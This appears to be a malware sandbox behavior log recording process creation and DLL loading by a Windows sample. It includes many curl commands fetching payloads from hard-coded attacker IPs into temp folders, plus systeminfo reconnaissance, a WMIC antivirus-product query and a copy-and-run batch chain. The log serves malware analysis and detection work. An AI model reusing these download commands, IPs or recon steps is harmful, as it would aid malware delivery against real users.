Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
